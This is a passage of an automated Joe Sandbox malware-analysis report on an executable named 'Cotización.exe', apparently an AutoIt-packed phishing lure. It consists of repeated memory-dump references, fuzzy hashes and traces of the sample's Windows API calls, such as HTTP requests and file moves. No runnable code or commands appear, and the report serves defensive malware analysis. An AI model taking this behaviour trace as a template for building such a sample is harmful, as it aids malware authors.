                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                APIs
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,0040F545,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,004A90E8,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,?,0040F545), ref: 0041013C
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                • MoveFileW.KERNEL32(?,?), ref: 00453932
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                • String ID:
                • API String ID: 978794511-0
                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove$_memcmp
                • String ID: '$\$h
                • API String ID: 2205784470-1303700344
                • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                APIs
                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                • VariantClear.OLEAUT32 ref: 0045EA6D
                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                • __swprintf.LIBCMT ref: 0045EC33
                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                Strings
                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                • String ID: %4d%02d%02d%02d%02d%02d
                • API String ID: 2441338619-1568723262
                • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                APIs
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Interlocked$DecrementIncrement$Sleep
                • String ID: @COM_EVENTOBJ
                • API String ID: 327565842-2228938565
                • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                APIs
                • VariantClear.OLEAUT32(?), ref: 0047031B
                • VariantClear.OLEAUT32(?), ref: 0047044F
                • VariantInit.OLEAUT32(?), ref: 004704A3
                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                • VariantClear.OLEAUT32(?), ref: 00470516
                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Variant$Clear$Copy$CallDispFuncInit
                • String ID: H
                • API String ID: 3613100350-2852464175
                • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                • String ID:
                • API String ID: 1291720006-3916222277
                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                APIs
                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                • IsMenu.USER32(?), ref: 0045FC5F
                • CreatePopupMenu.USER32 ref: 0045FC97
                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Menu$Item$CountCreateInfoInsertPopup
                • String ID: 0$2
                • API String ID: 93392585-3793063076
                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                APIs
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                • VariantClear.OLEAUT32(?), ref: 00435320
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                • VariantClear.OLEAUT32(?), ref: 004353B3
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                • String ID: crts
                • API String ID: 586820018-3724388283
                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                APIs
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,0040F545,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,004A90E8,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,?,0040F545), ref: 0041013C
                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                • _wcscat.LIBCMT ref: 0044BCAF
                • _wcslen.LIBCMT ref: 0044BCBB
                • _wcslen.LIBCMT ref: 0044BCD1
                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                • String ID: \*.*
                • API String ID: 2326526234-1173974218
                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                APIs
                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                • _wcslen.LIBCMT ref: 004335F2
                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                • GetLastError.KERNEL32 ref: 0043362B
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                • _wcsrchr.LIBCMT ref: 00433666
                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                • String ID: \
                • API String ID: 321622961-2967466578
                • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wcsnicmp
                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                • API String ID: 1038674560-2734436370
                • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                • __lock.LIBCMT ref: 00417981
                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                • __lock.LIBCMT ref: 004179A2
                • ___addlocaleref.LIBCMT ref: 004179C0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: KERNEL32.DLL$pI
